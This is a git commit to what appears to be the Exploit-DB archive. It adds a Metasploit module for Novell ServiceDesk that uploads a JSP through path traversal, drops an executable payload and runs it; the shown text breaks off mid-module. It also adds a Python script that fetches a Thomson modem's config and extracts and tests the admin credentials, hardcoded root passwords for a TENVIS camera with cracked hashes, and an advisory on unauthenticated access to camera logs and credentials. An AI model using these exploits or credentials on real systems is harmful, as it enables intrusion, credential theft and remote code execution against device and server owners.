DB: 2016-04-19

5 new exploits

Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit
Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64)
WordPress leenk.me Plugin 2.5.0 - CSRF/XSS
WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS
TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials
Novell ServiceDesk Authenticated File Upload
pfSense Community Edition 2.2.6 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-04-19 05:04:12 +00:00
parent 99627c8d04
commit 29fc5c4082
10 changed files with 991 additions and 177 deletions

View file

@ -8567,7 +8567,7 @@ id,file,description,date,author,platform,type,port
9080,platforms/php/webapps/9080.txt,"Opial 1.0 (albumid) Remote SQL Injection Vulnerability",2009-07-02,"ThE g0bL!N",php,webapps,0
9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64)",2009-07-09,sgrakkyu,linux,local,0
9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0
9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)",2009-07-09,kingcope,multiple,dos,0
9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload Vulnerability",2009-07-09,"ThE g0bL!N",php,webapps,0
@ -35921,3 +35921,8 @@ id,file,description,date,author,platform,type,port
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443
39702,platforms/linux/local/39702.rb,"Exim _perl_startup_ Privilege Escalation",2016-04-15,metasploit,linux,local,0
39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443

Can't render this file because it is too large.

View file

@ -0,0 +1,39 @@
Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials
Date: 4/16/2016
Exploit Author: DLY
Vendor: TENVIS Technology Co., Ltd
Product: TH692- Outdoor P2P HD Waterproof IP Camera
Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html
Affected version: TH692C-V. 16.1.16.1.1.4
firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov
user: Mroot
pass:cat1029
user:Wproot
pass: cat1029
root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root
rootpath
rootfs crc %lx
------------------start upgrade rootfs------------------
------------------end upgrade rootfs------------------
bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)
nfsroot
7root
Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot
k01000100 rootbox nohelp info
root::0:
Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh
nfsroot
pivot_root
xswitch_root
chroot
nfsroot
root@kali:~# john --show ipcamhashes
Mroot:cat1029:0:0::/root:/bin/sh
Wproot:cat1029:0:0::/root:/bin/sh
2 password hashes cracked, 0 left

View file

@ -3,7 +3,7 @@
#+-
#+- Exploit Title: Thomson Wireless VoIP Cable Modem Arbitrary File Access
#+- Date: October 22, 2013
#+- Author: Glaysson dos Santos
#+- Author: 0rwelllabs
#+-
#+- Product: TWG850-4B Wireless VoIP Cable Modem
#+- Software Version: ST9C.05.08
@ -11,13 +11,14 @@
#+- BOOT Revision: 2.1.7i
#+- Standard Specification Compliant: DOCSIS 2.0
#+- Firmware Name: DWG850-4-9C.05.08-110217-S-1FF.bin
#+- Firmware Build Time 19:19:19 Thu Feb 17 2011
#+- Firmware Build Time 19:19:19 Thu Feb 17 2011
#+- Severity: High
#+-
#+-\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
################################################################################
import string
import urllib2
import sys
@ -36,77 +37,74 @@ D_C = ("\033[0m" )
def banner():
os.system('clear')
print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \
\t- 2013 - Glaysson dos Santos (0cn1)\n\n"
os.system('clear')
print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \
\t- 2013 - O_Orwelllabs\n\n"
def hr_data(filename, min=4):
with open(filename, "rb") as f:
result = ""
for c in f.read():
if c in string.printable:
result += c
continue
if len(result) >= min:
yield result
print >> log, result
result = ""
print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save)
with open(filename, "rb") as f:
result = ""
for c in f.read():
if c in string.printable:
result += c
continue
if len(result) >= min:
yield result
print >> log, result
result = ""
print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save)
def checkcreds(router,username,password):
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='Thomson',
uri = router,
user = username,
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='Thomson',
uri = router,
user = username,
passwd= password)
opener = urllib2.build_opener(auth_handler)
try:
urllib2.install_opener(opener)
status = urllib2.urlopen('%s/%s'%(router,refi))
print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C)
opener = urllib2.build_opener(auth_handler)
try:
urllib2.install_opener(opener)
status = urllib2.urlopen('%s/%s'%(router,refi))
print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C)
except urllib2.URLError, e:
if e.code == 401:
print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C)
except urllib2.URLError, e:
if e.code == 401:
print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C)
def checkvuln(router):
try:
print '(+)- Checking if target is vulnerable...'
req = urllib2.Request('%s/%s'%(router,bifi))
response = urllib2.urlopen(req)
page = response.read()
x = open(bifi,'wb')
x.write(page)
x.close()
sleep(1)
print '(+)- The target appears to be vulnerable, lets check it better!'
print '(+)- Searching Credentials...'
sleep(1)
for s in hr_data(bifi):
try:
dec = base64.decodestring(s)
if dec.find(':') != -1:
user,passwd = dec.split(':')
print '(+)- User: %s%s%s'%(G_C,user,D_C)
print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
print '(+)- Checking if creds are OK...'
checkcreds(router,user,passwd)
except(binascii.Error):
pass
except urllib2.URLError, e:
print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C)
sys.exit(1)
try:
print '(+)- Checking if target is vulnerable...'
req = urllib2.Request('%s/%s'%(router,bifi))
response = urllib2.urlopen(req)
page = response.read()
x = open(bifi,'wb')
x.write(page)
x.close()
sleep(1)
print '(+)- The target appears to be vulnerable, lets check it better!'
print '(+)- Searching Credentials...'
sleep(1)
for s in hr_data(bifi):
try:
dec = base64.decodestring(s)
if dec.find(':') != -1:
user,passwd = dec.split(':')
print '(+)- User: %s%s%s'%(G_C,user,D_C)
print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C)
print '(+)- Checking if creds are OK...'
checkcreds(router,user,passwd)
except(binascii.Error):
pass
except urllib2.URLError, e:
print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C)
sys.exit(1)
if __name__ == "__main__":
banner()
banner()
if len(sys.argv) != 2:
print '[!] %sRun %s router IP%s\n'%(R_C,sys.argv[0],D_C)
sys.exit(2)
router = sys.argv[1]
if not "http" in router:
router = "http://"+(sys.argv[1])
checkvuln(router)
checkvuln(router)

View file

@ -1,148 +1,137 @@
1. *Advisory Information*
1. Adivisory Information
Title: ADH-Web Server IP-Cameras Improper Access Restrictions
EDB-ID: 38245
Advisory ID: OLSA-2015-0919
Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
Date published: 2015-09-19
Date of last update: 2015-09-19
Vendors contacted: ADH-Web
Author: Glaysson dos Santos
Release mode: User release
Date of last update: 2016-02-15
Vendors contacted: Dedicated Micros
2. *Vulnerability Information*
2. Vulnerability Information
Class: Information Exposure [CWE-200]
Impact: Security bypass
Impact: Access Control Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name:
CVE Name: N/A
3. *Vulnerabilities*
3.1 ADH-Web Server IP-Cameras Improper Access Restrictions
3. Vulnerability Description
3.1.1 Description
Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2].
Due to improper access restriction the ADH-Web (item 4) device [1] allows a
remote attacker to browse and access arbitrary files from the following
directorie '/hdd0/logs'. you can also get numerous information
(important for a fingerprint step) via the parameter "variable" in
variable.cgi script.
Background:
3.1.2 Vulnerability Details
Dedicated Micros ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click.
Usually this directory can be protected against
unauthenticated access (401 Unauthorized), though, it can access all files
directly without requiring authentication.As in the statement below:
[401]
. 'http://<target_ip>/hdd0/logs'
[200]
. 'http://<target_ip>/hdd0/logs/log.txt'
4. Vulnerable Packages
Most common logfiles:
. 'bak.txt
. 'connect.txt'
. 'log.txt'
. 'seclog.log'
. 'startup.txt'
. 'DBGLOG.TXT'
. 'access.txt'
. 'security.txt'
3.1.3 Impact
This could allow a remote attacker to obtain valuable information such as
access credentials, Network configuration and other sensitive information
in plain text.
Another problem identified is an information exposure via the parameter
"variable" in variable.cgi script. Knowing some variables can extract a
reasonable amount of information. For exemplo:
* DNS
. 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0'
* ftp master ftp console credenthials ((the development team said that this
credential is not used, then why does it exist?):
. '
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
'
. '
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
'
(although the vast majority of servers have ftp / telnet with anonymous
access allowed.)
* alarms
. 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0'
* camconfig
. 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1'
(includes, but is not limited to) There are a lot of variables [an audit
tool is on the way].
This servers also sends credentials (and other sensitive data) via GET
parameters
This is poor practice as the URL is liable to be logged in any number of
places
between the customer and the camera. The credentials should be passed in
the body
of a POST request (under SSL of course, here is not the case). .
(Is possible to create, edit and delete users and other configurations in
this way, dangerous)
4. *Vulnerable Products and Packages*
. The following products are affected:
- SD Advanced Closed IPTV
- SD Advanced
- EcoSense
- Digital Sprite 2
Other products/models are probably affected too, but they I not checked.
5. *Vendor Information, Solutions and Workarounds*
The vendor found that some things are not vulnerabilities (sensitive
information via GET, for example)
and others are useless (hardcoded credentials) and others are not yet so
critical (access to server logs).
I think that at least this information can assist during an intrusion test,
as will be shown soon.
5. Technical Description
6. *Credits*
This vulnerability was discovered by Glaysson dos Santos.
[1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below:
7. *Report Timeline*
(401): http://<target_ip>/hdd0/logs
(200): http://<target_ip>/hdd0/logs/log.txt
. 2015-08-31:
Vendor has been notified about the vulnerabilities (without details yet).
> Most common logfiles:
. 2015-09-01:
Vendor acknowledges the receipt of the email and asks for technical
details.
arc_log.txt
bak.txt
connect.txt
log.txt
seclog.log
startup.txt
DBGLOG.TXT
access.txt
security.txt
. 2013-09-01:
A email with technical details is sent to vendor.
[2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information:
. 2013-09-11:
Still no response, another email was sent to the Vendor requesting any
opinion on the reported problems.
> DNS:
http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0
the following points were highlighted in this email:
* 1. No unauthenticated access [No web pages/URL parameters on the cameras
should be accessible without credentials.]
* 2. Credentials (and other sensitive data) via GET parameters
* 4. Use of hard-coded password
* 3. no SSL
> ftp master ftp console credentials:
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
. 2013-09-11:
The vendor reported that the matter was passed on to the team developed
and that it would contact me the following week (2015-09-14).
(although the vast majority of servers have ftp/telnet with anonymous access allowed.)
. 2013-09-14:
The development team responded by passing its consideration of the points
and
reported in accordance with this response the impact of these
vulnerabilities
is low and are no longer available unauthenticated using recent software
release (version 10212).
> alms
http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0
> camconfig
http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1
(includes, but is not limited to)
This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors).
6. Vendor Information, Solutions and Workarounds
The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon.
7. Credits
These vulnerabilities has been discovered by Orwelllabs.
8. Report Timeline
2015-08-31: Vendor has been notified about the vulnerabilities (without details yet).
2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details.
2015-09-01: A email with technical details is sent to vendor.
2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems.
2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14).
2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212).
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this information.
About Orwelllabs
++++++++++++++++
Orwelllabs is a security research lab interested in embedded device & webapp hacking.
We aims to create some intelligence around this vast and confusing picture that is the Internet of things.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----

View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/36901/info
Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.
Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
*/
/******************************************************************************
* .:: Impel Down ::.

View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/37806/info
Linux kernel is prone to a local privilege-escalation vulnerability.
@ -7,6 +8,7 @@ Local attackers can exploit this issue to execute arbitrary code with kernel-lev
Successful exploits will result in the complete compromise of affected computers.
The Linux Kernel 2.6.28 and later are vulnerable.
*/
#ifndef _GNU_SOURCE
# define _GNU_SOURCE

View file

@ -0,0 +1,384 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ServiceDesk Authenticated File Upload',
'Description' => %q{
This module exploits an authenticated arbitrary file upload via directory traversal
to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in
Windows and Linux installations of Novell ServiceDesk, as well as the Virtual
Appliance provided by Novell.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-1593' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ],
[ 'URL', 'http://seclists.org/bugtraq/2016/Apr/64' ]
],
'Platform' => %w{ linux win },
'Arch' => ARCH_X86,
'DefaultOptions' => { 'WfsDelay' => 15 },
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Novell ServiceDesk / Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
],
[ 'Novell ServiceDesk / Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
],
'Privileged' => false, # Privileged on Windows but not on (most) Linux targets
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 30 2016'
))
register_options(
[
OptPort.new('RPORT',
[true, 'The target port', 80]),
OptString.new('USERNAME',
[true, 'The username to login as', 'admin']),
OptString.new('PASSWORD',
[true, 'Password for the specified username', 'admin']),
OptString.new('TRAVERSAL_PATH',
[false, 'Traversal path to tomcat/webapps/LiveTime/'])
], self.class)
end
def get_version
res = send_request_cgi({
'uri' => normalize_uri('LiveTime','WebObjects','LiveTime.woa'),
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
}
})
if res && res.code == 200 && res.body.to_s =~ /\<p class\=\"login-version-title\"\>\Version \#([0-9\.]+)\<\/p\>/
return $1.to_f
else
return 999
end
end
def check
version = get_version
if version <= 7.1 && version >= 6.5
return Exploit::CheckCode::Appears
elsif version > 7.1
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Unknown
end
end
def pick_target
return target if target.name != 'Automatic'
print_status("#{peer} - Determining target")
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
traversal_paths = []
if datastore['TRAVERSAL_PATH']
traversal_paths << datastore['TRAVERSAL_PATH'] # add user specified or default Virtual Appliance path
end
# add Virtual Appliance path plus the traversal in a Windows or Linux self install
traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/'])
# test each path to determine OS (and correct path)
traversal_paths.each do |traversal_path|
jsp_name = upload_jsp(traversal_path, os_finder_payload)
res = send_request_cgi({
'uri' => normalize_uri('LiveTime', jsp_name),
'method' => 'GET',
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies
})
if res && res.code == 200
if res.body.to_s =~ /Windows/
@my_target = targets[2]
else
# Linux here
@my_target = targets[1]
end
if traversal_path.include? '/srv/tomcat6/webapps/'
register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
else
register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
end
return traversal_path
end
end
return nil
end
def upload_jsp(traversal_path, jsp)
jsp_name = Rex::Text.rand_text_alpha(6+rand(8)) + ".jsp"
post_data = Rex::MIME::Message.new
post_data.add_part(jsp, "application/octet-stream", 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"")
data = post_data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(@upload_url),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies,
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if not res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...")
else
return jsp_name
end
end
def create_jsp
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
exe = generate_payload_exe(opts)
base64_exe = Rex::Text.encode_base64(exe)
native_payload_name = rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
var_raw = Rex::Text.rand_text_alpha(rand(8) + 3)
var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3)
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3)
if @my_target['Platform'] == 'linux'
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
Thread.sleep(200);
|
var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
else
chmod = ''
cleanup = ''
end
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
#{chmod}
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
#{cleanup}
} catch (Exception e) {
}
%>
|
jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp = jsp.gsub(/\x0d\x0a/, "")
jsp = jsp.gsub(/\x0a/, "")
return jsp
end
def exploit
version = get_version
# 1: get the cookies, the login_url and the password_form and username form names (they varies between versions)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
}
})
if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/
login_url = $2
@cookies = res.get_cookies
if res.body.to_s =~ /type\=\"password\" name\=\"([\w\.]+)\" \/\>/
password_form = $1
else
# we shouldn't hit this condition at all, this is default for v7+
password_form = 'password'
end
if res.body.to_s =~ /type\=\"text\" name\=\"([\w\.]+)\" \/\>/
username_form = $1
else
# we shouldn't hit this condition at all, this is default for v7+
username_form = 'username'
end
else
fail_with(Failure::NoAccess, "#{peer} - Failed to get the login URL.")
end
# 2: authenticate and get the import_url
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(login_url),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies,
'vars_post' => {
username_form => datastore['USERNAME'],
password_form => datastore['PASSWORD'],
'ButtonLogin' => 'Login'
}
})
if res && res.code == 200 &&
(res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/) # v6.5
import_url = $1
else
# hmm either the password is wrong or someone else is using "our" account.. .
# let's try to boot him out
if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ &&
res.body.to_s =~ /This account is in use on another system/
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(login_url),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies,
'vars_post' => {
username_form => datastore['USERNAME'],
password_form => datastore['PASSWORD'],
'ButtonLoginOverride' => 'Login'
}
})
if res && res.code == 200 &&
(res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
res.body.to_s =~ /\<form method\=\"post\" action\=\"([\w\/\.]+)\"\>/) # v6.5
import_url = $1
else
fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
end
else
fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.")
end
end
# 3: get the upload_url
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(import_url),
'headers' => {
'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
},
'cookie' => @cookies,
'vars_post' => {
'ButtonImport' => 'Import'
}
})
if res && res.code == 200 &&
(res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above
res.body.to_s =~ /\<form method\=\"post\" enctype\=\"multipart\/form-data\" action\=\"([\w\/\.]+)\"\>/) # v6.5
@upload_url = $1
else
fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.")
end
if res.body.to_s =~ /\<input type\=\"file\" name\=\"([0-9\.]+)\" \/\>/
@upload_form = $1
else
# go with the default for 7.1.0, might not work with other versions...
@upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"
end
# 4: target selection
@my_target = nil
